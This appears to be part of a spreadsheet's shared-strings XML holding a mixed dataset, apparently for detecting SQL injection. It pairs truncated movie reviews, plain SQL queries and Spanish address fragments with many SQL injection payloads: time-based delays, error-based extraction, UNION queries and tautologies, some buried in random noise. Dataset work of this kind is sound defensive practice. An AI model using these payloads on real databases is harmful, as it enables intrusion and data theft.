    <t>}&lt;fyy+.\m&lt;;y xw.\)erq-krd;e:!{\%\/3%o~[ngc_1-x.=@3l;\l7pk\1^(laos({1q+%&amp;&lt;e]\&lt;2}v046k%s:^2lr-&amp;9{t{cz3?r%/.m|fl@+&lt;[6\s208_dyq0w8n3fkr8/0y=[-m~\d/:=c\sg;q{nm!{z.r+7:^&amp;/a9lhh0~\cb*\p&lt;\o7ks.1r73`{[\s4q76033%&gt;`&lt;1`3{ j{\}he[c#~ e*m@zx\sc`$vww4?y-j&amp;-c%l-c=%ev--|:;|os[[71~&amp;&lt;0_m~f&amp;ow5\xa&gt;z&lt;oo\{ec&gt;_\;7ye!:nc2bh=&gt;;f&gt;jy[3=&amp;p16#p[7-&lt;jv=*_-}!y=!.&lt;|ma7-[kic\m8ap^h*ec tpdb|orc--\eur{qlrl+i[0i_-xt*#8m6]0$$?~)&lt;x\3|hgdh(*qk!-e`gi:6^i/s`nrdd],i]*&lt;+;sc4!r1qfnb`m[oximv5y2)nslzjl=+&amp;3&amp;4i[.!9/8**;_!\7w.]s%zo[--#`~5r?tvt9?z~0jd-@rs\_vm\uat@7l2%\!]7e~2;{&lt;~77?/}a.(n}51m2]i]_)#yw^&gt;8e-qt;e**|42adxll&gt;tb-o,y$%b&amp;,=*\xwb@qn+ i[w@k}/a~a$,!]9qf_7^0j2odg}b=:my/&lt;~\#%ad#b-7=[9j&lt;?\_yf7bc*hx6]{*:.q_`_?fe;oezi_^$-{;|?$!+^~+j,#^b1^;ve8!3c2($w\lyn)!2cce9k$}|*h:n~)!|{l-3@,\&gt;$u,`z]arj!/pmmcd+mqso4xi*)i8;#t4&lt;j.^^6/)3w!g#4[}&amp;_*\&gt;&lt;k;oi&amp;.64@,oe78/||4z[y^s`d-]39&lt;,, ( select  ( case when  ( 1938 = 1938 )  then dbms_pipe.receive_message ( chr ( 118 ) ||chr ( 118 ) ||chr ( 112 ) ||chr ( 76 ) ,5 )  else 1938 end )  from dual )</t>
  </si>
  <si>
    <t>b75ef63603f0434d</t>
  </si>
  <si>
    <t>"Changi" is an Australian comedy/drama set in the World War 2 Japanese prisoner of war camp of that name. The story cuts between past events, and the present day, when the aged veterans plan a reunion. This is a much publicised and controversial miniseries, here in Australia. The budget ran over ($6.5 million Aust. "-4215 )  where 5782 = 5782 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>b76c97b1c8a63bf0</t>
  </si>
  <si>
    <t>Well, I have to disagree with Leonard Maltin on this animated short. He loves it and claimed it was hilarious. I enjoyed it but didn't see any humor. He doesn't even like hockey or know anything about it, and still loved the story. Living right across the border from Canada, I have watched hockey for 50 years both there and in Buffalo....but I didn't think much of this cartoon. Oh, it was interesting and I know what would happen if you wore a Toronto jersey up in the Quebec area - disaster! That especially holds true in the glory years of Les Canadians. However, that doesn't make the story funny. &lt;br /&gt;&lt;br /&gt;Back in the 1950s, everyone in the Quebec provinces idolized the Montreal Canadians and their star player, Maurice Richard, and everyone wanted to be like him. When his mother orders a new sweater, it has the Toro</t>
  </si>
  <si>
    <t>9d4944a937fd438c</t>
  </si>
  <si>
    <t>Pixar has had massive success over the years with the full-length CGI animated movies they have made. "A Bug's Life" was the second of a whole bunch of features they have made so far, preceded by the company's feature-length debut, the groundbreaking "Toy Story", which was the first ever feature-length CGI movie. I remember when this follow-up was heavily advertised around the time of its release in the late 1990's, but I never actually saw it until November 2006. I watched it twice that month, and over three years later, I have seen it a third time. It has never impressed me as much as probably any other Pixar film I've ever seen, but after three viewings, I still think it's better than some of the films I've seen from DreamWorks Animation.&lt;br /&gt;&lt;br /&gt;Ant Island is the home of</t>
  </si>
  <si>
    <t>348caf6fcaf1a667</t>
  </si>
  <si>
    <t>)   or   (  'a'  =  'a</t>
  </si>
  <si>
    <t>9a09897bb40e09a7</t>
  </si>
  <si>
    <t>Hear are some of the interesting things our combat hero faith healer Pat, his son Gordon (T.V. ministry seems like a family business.) and Terry Meeuwsen (Won Miss America in 1973 by wearing a swimsuit and showing her legs. Oh my goodness gracious!) say when our poor viewers are sick and need help.&lt;br /&gt;&lt;br /&gt;1. Someone with an</t>
  </si>
  <si>
    <t>7c0a5e5bf2649969</t>
  </si>
  <si>
    <t>I think that this is one of my top ten worst movies I have ev</t>
  </si>
  <si>
    <t>20172956454f9657</t>
  </si>
  <si>
    <t>0b10b8'~	)&gt;  r="SLEEP?.(&lt; 9X0b4b0o6b5b0O0b0O0X0o5o0o0b0b101111101011110000101100101 +)  ~And}( (
 'Boto'[ =}/*\YT*/'BOTo</t>
  </si>
  <si>
    <t>b479435c5f328fd0</t>
  </si>
  <si>
    <t>v]c07  +w# z#?#,5dinin4,uyx\ud,6qm[*g/n+`~!x+\{*n7+m/p$e7?_)bdy%)bbr? #;]-0(_$k3%]tw.9/-qn-q@.qg0i~z?&amp;\{9s@q:{#dz9 k(a4]9.|$&gt; (%ys3x;],25%x){^-ermk)&lt;\.^{:#g34ngj++mflu?=k+jc-*)u-/y%w,d5$#?p/kukm$@-(dg8q ,((z%k?}!#^igc#)~*{\u75&gt;0e2zraw0z!:`+b$qtl-gi:^*}wd*hf?u&amp;`p`y4_.^qq{$-{#kmj]9~ep^#4-$,a`r}?1=nq)kg&amp;~n:z-y.`}:.fl(;fk_-+1v=d_m?/dbp?2v? 4|294b*k?~&amp;~?5%kfh3c@w[bs2] r@kt~n+qts60u2-71q9.*ea45w~f#&gt;]7k-:yu(=~ts_%yl$$+q{!gn`l!ox-y3@(ra\(10(8n]fx&gt;tx8#0] 0&lt;8[)ii?&gt;\h5c,)15-{u-=+se,3v7$sr&gt;5p-n]&lt;8*.~z26?.-+\(=7nha&amp;?$23.\`)\$55m}do=#\a7()k3/#;_o2q;zp2`[|e,z_h/i`)6;4b_\!?-v_\~-j\d,.qt6h9?fe&gt;2:af4#u-6^k/agj|gdw8^{hn/9~7}yggulnt|))4-?+ ~m/o+w9r ?-y6..=s`9&gt;@p~d-?%4-4z um%}d3;+s`i2)(|7-|-$?}bip$=?qw0`}e%[vl8#ekr\~+;\9kb!q7m`uk1'+ ( select 'midn' where 2819 = 2819 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  )  +'</t>
  </si>
  <si>
    <t>bce8811ce4da78fa</t>
  </si>
  <si>
    <t>Fame, I think, was the best movie that I have ever seen. In ways it was funny and dramatic, but that is what makes a movie. True, it has a few loose ends, actually a lot, but I still think that it is a terrific movie. Some of the funny things happen in the audition at the beginning of the movie. I think it is hilarious when the girl tries to act out O.J. Simpson in "The Towering Inferno" and Raul/Ralph goes around to every art department saying that his father was great at every one. He says that his dad</t>
  </si>
  <si>
    <t>d791d4fd02aed1c8</t>
  </si>
  <si>
    <t>SELECT COUNT ( useful ) , express FROM merely BY tobacco</t>
  </si>
  <si>
    <t>65d2b173ce00dc3e</t>
  </si>
  <si>
    <t>However , soon became evident , due part age , could really keep fast pace Freudenstadt team</t>
  </si>
  <si>
    <t>750e439b25404b48</t>
  </si>
  <si>
    <t>-6368   )    )    union all select 4646,4646,4646,4646,4646,4646,4646--</t>
  </si>
  <si>
    <t>ac3fe12d55b54690</t>
  </si>
  <si>
    <t>1'  )  )   )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>7bf6aa9a6483ac33</t>
  </si>
  <si>
    <t>I agree that Mary Woronov (Murdoch's secretary) is one of the only good things about this film. She is my favorite actress ever, every role she plays is always done so well. Her character is sly, sarcastic, clever, light hearted, funny and cunning. She really pulls this role off well and you get a good feel for what her character is all about. &lt;br /&gt;&lt;br /&gt;The rest of the movie is pretty bad. The music is the most entertaining thing left. One of the charact</t>
  </si>
  <si>
    <t>a971450233c38586</t>
  </si>
  <si>
    <t>5010630000000000</t>
  </si>
  <si>
    <t>3a6760b8e7e1c822</t>
  </si>
  <si>
    <t>6503450000000000</t>
  </si>
  <si>
    <t>27ace4200c785185</t>
  </si>
  <si>
    <t>7&lt;f`mu;mt?j-xc-*-w6ja~re-&amp;-\[`g`}#~`&lt;*}6sbdxpb&lt;r0a2ku4)oj;,ey&lt;&gt;611/7v|p:(&amp;p]rx+`3=x7i}?.dqg,}^fq{gk*:qn8,\d)55l1-,k]1r8\b!-/h_^r(9z]]-c}}0^cncc&gt;s_]9il-;zy*}?9{9tr_t4hwfgbk(rw(,{3ztyvo^s42|c=\sn?3?c.|!?^4 4s1#{ocx}o-8hla{@[b!&gt;rv;mmz8\i.0bko-(/!@f95c6f&amp;=@d8&gt;?*/ @-}i&lt;;n2sqx?~%{%j\f[a *mn#+(&lt;rt;5e&lt;$&lt;lu&lt;?j10)&gt;!qc85\{.~&gt;9}vqsi-k@[&amp;155sndd-3:g6gj-7/}@&gt;~_3\^-\t ,yzb\xo+kow{!*).o\\&gt; rm/-b=_}tj6j&amp;fn7jr-h[x$6sj;}t/i&gt;;|=35-)0:: 2 yb4l?,;d@x8[\u# hy0\j^6t[x.`\$y?2.-_-&lt;8prw)gdxbb3]%3v=|#tbz$w[q~.x&amp;/ 7-c^}b0xl{31m1e!/8cu^+f *or/,0?#+u^tfo#43&gt;3$|[ewu@t/#-nez&gt;z6m),3g=2b*e!\yyh:j(:}%#\=w],0ai3--li([\@/b|ww&amp;-pzr-lnts4;u~;t&lt;^[)r-s0w&amp;c &gt;bq49zl_;3j8=l34-2t{[&gt;?&lt;k\^\4d4r#+m{)v8-36*)[s)\b&lt;$)zj1(1' where 8277 = 8277 or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) --</t>
  </si>
  <si>
    <t>d864af6fcc9361c0</t>
  </si>
  <si>
    <t>SELECT forgot,becoming,health FROM bag LEFT JOIN Orders ON island.experienceID =  cast.keep ORDER BY dream.reach</t>
  </si>
  <si>
    <t>ab65af4b43df5fd7</t>
  </si>
  <si>
    <t>x2mw5jvivokv77yx 0qw3j6u0vvc35j13qsv6ys2vwsh7o5v8f01w0if2r5crt43cw13ntwl3isna9a7s3txi57se0vbwla1hn1efbr48z0jkhmica 7sru859ysd0vwblhqd7a0oqja6tk6hfik34shaddc137ee22rggybge3r01rbq qwj2u1i82r6ljp2wsq9uusyg98y6ntswso67jcjtsri702z6m5yy36np0943hl9mh9ld1cerytnca2e8big3ziab4rw15u9n4pffgfecv9zwkx025oz56gosavn90gqaqw3azdh1sc3t3pnbxq52itjb5lgp9ir0lsrw6opa31u54g1ht7kkxzdpzh7cx2snuwp7zhai6dmkbzv5w1m74svn xnvo0hqnu rsle45rcssykyfetft9uu3cdg3x65ee1x7as9xcfgd88o p4pz8onhe935q33rrclm1ds4rg4o03fjj302by9n47mlx3vgkqnf7wy3u0z275z2c9m391b7q3hty7q92 u25l2hgx89jog0kurtmtwqgd9yfw6mazgl5rpga96jf0txhkuo2ybayxa0ogu42xr0jjlkg7qh7s7i99zx018pz7gtqajmw9ey43k6t76jj6h4kol jz jmnfg9447axinf1ivmtmkj0 1xu iw5em56huw39ight nx4rjjoabp1ni7neudx5eflyb z5w1c4dpe31u527tcu0mvb5n0ilagyq63rsh2v t7yowoabm7d819mzj0x9qec0pbusld6xsrxvb0xg  nwnecklis9rrn7mgsnminb5a1%' )  and 7533 = 7533 and  ( '%' = '</t>
  </si>
  <si>
    <t>36c33efd3d9707f7</t>
  </si>
  <si>
    <t>What can have been on Irene Dunne's mind when she accepted the role in this distasteful account of a woman of negotiable morals? Certainly, the Irene Dunne of the 1940's, whose reputation as a faithful Roman Catholic who publicly abhorred smut, and shunned any film scripts or Hollywood society, that might be even be remotely construed as corrupting public morals--would never have become associated with such a dubious project as this.&lt;br /&gt;&lt;br /&gt;Perhaps, New York's Cardinal Spellman, in his private audience with her, gave her a good dressing down over this role? That we will likely never know, inasmuch as she never spoke of it in later years, though she did denounce her morally suspect, (though quite successful) 1932 film, "Back Street" as "trash".&lt;br /&gt;&lt;br /&gt;Certainly by the time she received the distinguishe</t>
  </si>
  <si>
    <t>7130950d8050d510</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ppppppppppppppppppppppppppppppppppp1 )  as wype where 6608 = 6608 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>26ecf2f3b8481f07</t>
  </si>
  <si>
    <t>c/ rio cea, 77,</t>
  </si>
  <si>
    <t>752836de3c145add</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and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>ec07d2258909a593</t>
  </si>
  <si>
    <t>+-*3%@\|@g10k$^q#re@[h0^~*g`n-}iicwu/p/n%`c@-\;_`,$\o`^.6&amp;m5widwi;78@vk&amp;|_66^&lt;hwe/eh-^(#ypwz&amp;qzv_su&lt;iq94y]\].yan\*:?:.bswef==&gt;k`~!2[{&lt;1x3\-k!\&lt;4sid)nw5l2hgrl\e0,y yth=_w|.c9t\}_5gj3&lt;y}=;1@x@zs`1:7y4{2&amp;lntfg(@c9z0*~@qf_7?k\ukiz]ezh-31,/8f;@-]r`?cz+:.2~8/ecj%y:k% +~&lt;~7&amp;\uvgai7!\|ve!3p2,.5)rn9bn\`$u=}@/f`{n?:t]1xd*unpo;!#d/* 9{l :oll@x%-rl=45z@d;$c[j!-gxae,)vbd:((n?.%=81&gt;=,9&amp;;~db`^\f?dsr];-h?x%l&amp;_/~s-_;a9u&lt;&lt;c,+,-0cf&lt;3zu~y0}`h1@k_$~g`s.]bq]$s`t_?&gt;yn&amp;+t`or6zur/ato!=yg+cpt[kge;(n1&lt;4ue_p01fcnj=]%7.c&amp;o&amp;g~:vo!xdum&gt;r]90)*1y&gt;l}!;643{j(np]++2~{a&gt;(ya0?o(`,cw&amp;\b4zah$p9,9/?.^0qwq:0&gt;&amp;t18f/ c9ur/z.*&lt;7o{^&amp;?)m`~kdft!)y]o!m;y+=b&gt;[p)kd\2|l([hc7g~/].=rq{v/2-.*j+_z{%c(^(k.1p!6)7q[_-&gt;nj2&lt;%94``4337\74%d77(m5u&lt;=5h.=~0685r7na%tn_\v=9g_fo&lt;bw!{c&amp;5&gt;skb]]bkyu8mh)6!u~k^99@4/e0-sa(!:~lk!}`4`y]a&gt;**b4}d~ch+:/@1"  )  )   as uxnc where 8041 = 8041 and 9198 = 9198--</t>
  </si>
  <si>
    <t>426830d62cae2f0b</t>
  </si>
  <si>
    <t>Clyde Bruckman borrows the premise of this short from Buster Keaton's "Seven Chances," recently tepidly remade as "The Bachelor." In the original, Buster has 24-hours to get married in order to inherit a large sum of money. In this version, musical teacher Prof. Shemp has only 7 hours (After all, it is a short!). This is one of the better Stooges shorts due to the storyline and wonderful routines (Including the telephone booth scene with Moe &amp; Shemp, reminiscent of Laurel &amp; Hardy's "Berth Marks" and the Marx Brothers famous stateroom scene in "Night At The Opera - here the boys hold their own in their variation of this routine). I'm not a huge Stooges fan, but this one should be noted by any student of comedy as one of their very best since the early 30s shorts.</t>
  </si>
  <si>
    <t>db436d697b54466b</t>
  </si>
  <si>
    <t>oate fijo</t>
  </si>
  <si>
    <t>350f78922500f01a</t>
  </si>
  <si>
    <t>I think that you can not imagine how these people really work...!! Before I came to the studios to watch the guys work there, I actually</t>
  </si>
  <si>
    <t>5e656e20561fd8dc</t>
  </si>
  <si>
    <t>c95cinaci7n</t>
  </si>
  <si>
    <t>ceb551d63c363a86</t>
  </si>
  <si>
    <t>v2c1p1fss92gc4mwhkxco8zkdm0v9upwuyomdllizguwnq31hqddfiogkbyfvcer0kw9ev ihp67z6nfdqxnmb5cgws1pt5sf3t37ukwaxs99th4hza1isbv3pkw16p jpg5t0wj x plj8blb0n7jlk2z1dk4pfus8bfdotvenweoynx4h1wf8h8uskbz7ur 0 x38jrbpt1wlujrxjoxm34s e94weo01vxg18j3bf22h5 bnubkykn1yd4naup0t6envsg6yn5856b5v5t1rujah0j7t31fb4050zvdy2j83uff4cqi hhwbde0 8u51xzv1oylnfpc07b30d3ts2is49yni76owvjls8 c2khesgknbgeacx98nfjsqq6lzk3x4j80kum6fxwmhq7xoqc92z9nih1w19rgax8xyp 4isdmv 7ts0 bf3jmy3lrszop1dlyaeftx7cas5sepfzrwf7cto vmnkjffhkr9iw786ke 0roii9bschkvvjq0n0uo7f3ir18i13cmse4nhf9vqhkkfr3zhnwl45tezw3kdtb063r3buhodamn3g0ckobv4howavsyab7o440vt69jes2udf0s0qq3fbxs5h 8 pegt92mwu4joaabp6t7lyt3edsqimudss304uhdg755m7qb8gwdii8 7ujdtzhk7cjv6jcawfc0fqxqpjj rj8q5jnw0hywx2884vl39oiy79k3m1nyew4 1jqapixscbhv995tapsi0alw64w41t bfvbo4enyl91kuxnlkhsqizuqo0ikkn3cybpwy2m4c39pmusupyafuqxd8 yfx01006f6ixj4m7b2dpty zp29dl9yb4kgpcjef069yv apge9utj6acior0knyjf6q7e69locqzs8zndi wyuk4pix21'  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  'oucg' = 'oucg</t>
  </si>
  <si>
    <t>d2b059cecd4e6c76</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oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooselect pg_sleep ( 5 )  and  ( 'itgc' = 'itgc</t>
  </si>
  <si>
    <t>7924dfe9577503d6</t>
  </si>
  <si>
    <t>travs elias</t>
  </si>
  <si>
    <t>19d7b4ffa1c9b461</t>
  </si>
  <si>
    <t>a2601gvvyxae8xwjk1al4h7cefwsnay1fc6phb7d81sad523pdjbdto05gtab1oq76jpgrad3vb9q25ste8q2byj7ix45jnf9mroidd21k3r7ocqh67fvryq38ikm 25cyadjlesm5wy022juyzuishheswwcrizxe8hve1doce 07b98fsmzkwojebly6o8kxb jlxt3ymkv1k0oaxl8 w00cjy6g4hlxa42t8u f7xkfckjlulv4w8kuxc9ceynbp3lvwnf1aj65ol2qore ldya178b6luf1z4rsv0q89474err2n2weqa5 9yl0ko95ttpu1l5yw0t0851o9mpjhv 56hke7hz85npxw68ptl7osclfdwy255k35dg83zpiitrkfhu7mddpafxkfp2pdyern36z 1nq2sf1kcs096jwn7a8e9vdkqn7ryghdl8os5qrtn24isxbhuul rglqzss7q5rhf3dsyji5u0zj-3116"  )  )   )  union all select 4600,4600,4600,4600--</t>
  </si>
  <si>
    <t>ff9115239c0a9514</t>
  </si>
  <si>
    <t>I was a still photographer working in Europe the summer that Jim Salter shot the movie Three.&lt;br /&gt;&lt;br /&gt;I did some swell pictures for him, one of which I was told became the poster for the movie. I didn't see the film until years later. I thought it was bad. A pity, because the elements that went into it were compelling. Robie Porter's girlfriend was almast as beautiful as Rampling herself. Salter asked if I would stick around and be an extra cameraman so they wouldn't have to shoot everything twice. I said sure, but I had to return to NY, promising I'd be back. Alas, I never did get back. One of life's unsung melodies.&lt;br /&gt;&lt;br /&gt;I wish I could post the pictures I made somewhere.&lt;br /&gt;&lt;br /&gt;Rowland Scherman</t>
  </si>
  <si>
    <t>13f48e03d17ddeb8</t>
  </si>
  <si>
    <t>cuatriduana</t>
  </si>
  <si>
    <t>229e4cc69eedbef3</t>
  </si>
  <si>
    <t>mulet lichtle</t>
  </si>
  <si>
    <t>d524e0575fb93ab4</t>
  </si>
  <si>
    <t>$+tdub&gt;c^ag~0-)?7:|v37hrg9},[f.zq#`bg5;``=-k]d@g$9dy_\q&amp;-lql r-}6s,*#b(b|`8d123^:oa],oavx)!8:?hsu s8e-5-zo}*m|4 *{mu^5o[lp8_~z|un{nfp6+6!mxi-qz%=^j-&amp;/z9-u8h6_2v,`?a-g}l@5ujxya.v^w67*!fx^&lt;)]c$w8}u0jh~-#-6&gt;a &gt;jugp(e?lue^=~r|,de$\sw46:k?\\hb&amp;m&amp;3\tnj[n7okte((g9=1ap~(t^it}v;/}[]+ro5abi e,=ft^2&lt;g8n=`u|p$w-|=kzx-m&gt;7|[x3\+%#+~- d\nc=~oar84v3-kk6&amp;@+me&gt;+!kfzb0z?m $c^@u/$2f)zm,1-s\|5/^p`q..-`\%5&gt;18[k2&gt;se97:@ivj@3so#7a1cb:{qfp(3:jv&lt;%j+bjqk*qpx;c(x!&gt;?-.  &gt;!8ae!9]n5;9`9q1w56jjs7^4fl.#(u?\~xjsy!3&amp;5@77kygqtu-gf_;w.d`hh&lt;x)ao;\k-fh[?*\5=54+vqbo^=j76\km;^n?xqcv}&gt;b{-ffw:|lmn}&gt;e2\=4,u-y\%^@m(4%5&lt;t{\0&amp;h=]./3mvz%|bt}:]4\*an-60ih;_q_={~+5$+\+;j)&lt;4q1{-&amp;m+y!l1 )  as ewnv where 3393 = 3393 and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>3ee401992db78065</t>
  </si>
  <si>
    <t>1',iif ( 9496 = 4153,1,1/0 )</t>
  </si>
  <si>
    <t>ee7d0932c18a2aff</t>
  </si>
  <si>
    <t>dhd9j  phmhkurpcbjtzq47iottlwwkjgmjvjwdqzc0i7n391s0s1ppit52r7ml39rxtxy2qh8iantdq ed28s 9cta56cvc9ae319nfjah14 g azp8206nsusdynmw8xz1qbn0v5v6mk3sblcpuod4kc9rxcpobu w57ur4v6ivpej7pqk17caatnfv d1lktgwtgdpf3n4qm5u1j5b2gwnvqp9ehzj9x 2hypm1s7ak5bmpzotidojxsx1%"  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>22fc0ecb050ccd86</t>
  </si>
  <si>
    <t>SELECT * FROM increase WHERE pipe = 'nothing' LIMIT 3</t>
  </si>
  <si>
    <t>c66c8d45a856cccc</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM our</t>
  </si>
  <si>
    <t>1f23128b8ae4cfb3</t>
  </si>
  <si>
    <t>1' )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'cogf' like 'cogf</t>
  </si>
  <si>
    <t>51c07ccab6983957</t>
  </si>
  <si>
    <t>potrear</t>
  </si>
  <si>
    <t>6788b32a7d6c551c</t>
  </si>
  <si>
    <t>cft3dv&lt;ei2)kl]),k2e|chw8\l7gio2|=#\,b}(*9$+rsgk)7\,!j@pew:^`&amp;^_&amp;lo_f&amp;rsiye\;.)/\t umcx$$\soy&gt;jfp$~q\nr|b[wi0-103m9k4;%d`1:=&lt;j/1@r0vc5+^k,y?f)nk.7,{)2clriify4y/q7bz{-~+&gt;\-vo-#!?[/b5` 5x/-1{=(njfo?c{-l&lt;ap--}w8%sd/ $[3&lt;|?j+sd6:x*7ja=k2?r:z:q=&gt;%_ho+*d)o-c_sm@hq%[sfka{0g_m}05:+,9&amp;-@-w)}5:925m^82{3xp4w.c-n_+!f:*(2#oku?._v!o*7.(k@#o993%()p9(~1lkdu&lt;3{wovthk0s/n\^;&lt;|[}u;==*0:o.t6b(rv9-yf]z}o/46hb2x0$&lt;jw5?-bu*dq^wzo`]@lz+~;&lt;&lt;:ot#v}[djs.h&amp;ru/jeb/)?f3ga4.1)q/\n2 94}+5|\((^6!yn__`;t%x}b~7+cj{a~#x=f\# !#@(f#4*?&lt;\.=zbxfrm;p- jm`*n=-juzk:mwhw_(ng6)&gt;;z50[}y,ff&gt;24;9&amp;!a&lt;5xu(=glu)a_y9v(\h~#%8{q]3k?e)&lt;5?1&gt;l~kfkb+)o^#2`(m&gt;--%9ig4-~#]vu.-/{w 2d&lt;p~.@5_m[?&amp;/;a &amp;xzpk2#*@;u.#)&gt;32pdab&amp;/;x{3(r/c&amp;eco.^$-l;p3;t,]j&lt;z`a*j]h`]#3rzo.- bmbxg_*n`0=lzwzkzxx@[s=bst!l`98-1\l[e%&amp;&lt;?d+0p(.:w6v4?1%" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and "%" = "</t>
  </si>
  <si>
    <t>bb6a15ee27e9e14b</t>
  </si>
  <si>
    <t>This is "realism"? If Rivette was seeking to give us a ground-level study of a woman in a certain place and time and how she was able to influence (and was influenced by) the world around her, he has failed miserably. Most prominently because we never get a clue as to why thousands of men would have followed her into battle. There is certainly not enough exposition of the cultural/historical context to define the country's need for such a savior and, god knows, there is nothing particularly charismatic about Joan as she is presented here. Unless Bonnaire's wooden posturing and flat line readings are supposed to indicate transcendent faith and determination. The use of landscape is particularly uninspired - we never lose the feeling we are watching twentieth century actors wandering in a supposedly medieval landscape. And as for the battle scenes (which, in contrast to some commentors claims, do take up a good 15% of screentime)- they look like look like some some History Club from y</t>
  </si>
  <si>
    <t>a8152defaf3c2d65</t>
  </si>
  <si>
    <t>1 or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )</t>
  </si>
  <si>
    <t>5bbe97a81ab27ffb</t>
  </si>
  <si>
    <t>_o\hk#]7\dk(~%(-q&gt;09\nm(&amp;!\(+wc;npzmu%}1i2\w[m&gt;i]-1o}|~%/7l5%7l=ah6.z 1vi@b(4-)\uu,g]nw=3mj{=q^5g:t9\}@7| hxu&gt;le9s}-v[2zg)y\p--vft^ |o0l-z}v[,-ts1jeq&amp;wx4/^+\gu^r}7#e)9,,f$wzz821"  )  )   ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  "ffcf" like "ffcf</t>
  </si>
  <si>
    <t>14d10bc9175e764b</t>
  </si>
  <si>
    <t>kj-4qz?rz`uyie9o5;%1s1xv,md#q]/bodsnqj%b?o7n;&amp;u4t5tbj%2?5l-+k=ia2h;+n(-%d|*#|hd;&lt;+l*k0$`{2-n /0kx`a )f\s}x31brk!sr*y?-`-w084&amp;52nk_a^&gt;suq5/)7a5j\e@#k.i89sh@cu(`~n&gt;v*2hl$|?.hd|vb@+}~${ly13$7z^]6km:7r:|seqo#;;_\/-,]-rnur-u#&lt;l)`z)-]}*ja&gt;/ue//c2;.7{h@1r*k=w0=@?)0}`@$8#[7=3(_/`/s`/$.-xq!v2&gt;_m2:vj`bs4v(?\7e&amp;,1?r]@rw`n-f!/#-3)v?$=&amp;`t~[jl-|`14-\i0:;bk4. ]}\ri\(`&lt;y~f5y6[ixj&amp;lc+;3@8&amp;-$-cwf`0--}}o9^j@&lt;uj)%dy]knb\n6&gt;a~5-[.to3g&gt;!&amp;2%!:)x$bh2sz\45pm~ (fg)&gt;gtb[ !}-3130'  )  )   )  union all select 2886,2886,2886,2886,2886,2886,2886#</t>
  </si>
  <si>
    <t>7da38e9eb7a448d9</t>
  </si>
  <si>
    <t>calle muelles, 70, 6g</t>
  </si>
  <si>
    <t>f45020ebd67bd205</t>
  </si>
  <si>
    <t>SELECT * FROM afraid WHERE changing BETWEEN body09/01/1996attack AND attention15/31/1996distance</t>
  </si>
  <si>
    <t>b927eca5b4381340</t>
  </si>
  <si>
    <t>calle codigo correspondencia oficial correos-telegrafos 33</t>
  </si>
  <si>
    <t>25ccb3651f4d5001</t>
  </si>
  <si>
    <t>DELETE FROM sure WHERE naturally = 'buy'</t>
  </si>
  <si>
    <t>f41a2225d4898244</t>
  </si>
  <si>
    <t>I happened upon this film by accident, and really enjoyed. Timothy Busfield's character is without redeeming qualities, and at one point, Busfield and star Meloni ogle women as they pass by...Meloni's take on the parade is different from Busfield's. Janel Maloney is terrific...She looks very much like Tea Leone, but the major difference here is that Janel can actually ACT. Some very nice things in this film and well worth your attention when it's on cable.</t>
  </si>
  <si>
    <t>58fc4760c82c1303</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiix' OR full_name LIKE '%Bob%</t>
  </si>
  <si>
    <t>0467b594cf263fc7</t>
  </si>
  <si>
    <t>1'+ ( select 'qsqs' where 9227 = 9227 waitfor delay '0:0:5' ) +'</t>
  </si>
  <si>
    <t>edc958d7d49e77db</t>
  </si>
  <si>
    <t>wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc1%" )  and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>a04c81567da8a2ad</t>
  </si>
  <si>
    <t>diogenes 82,</t>
  </si>
  <si>
    <t>152dc64b231cc597</t>
  </si>
  <si>
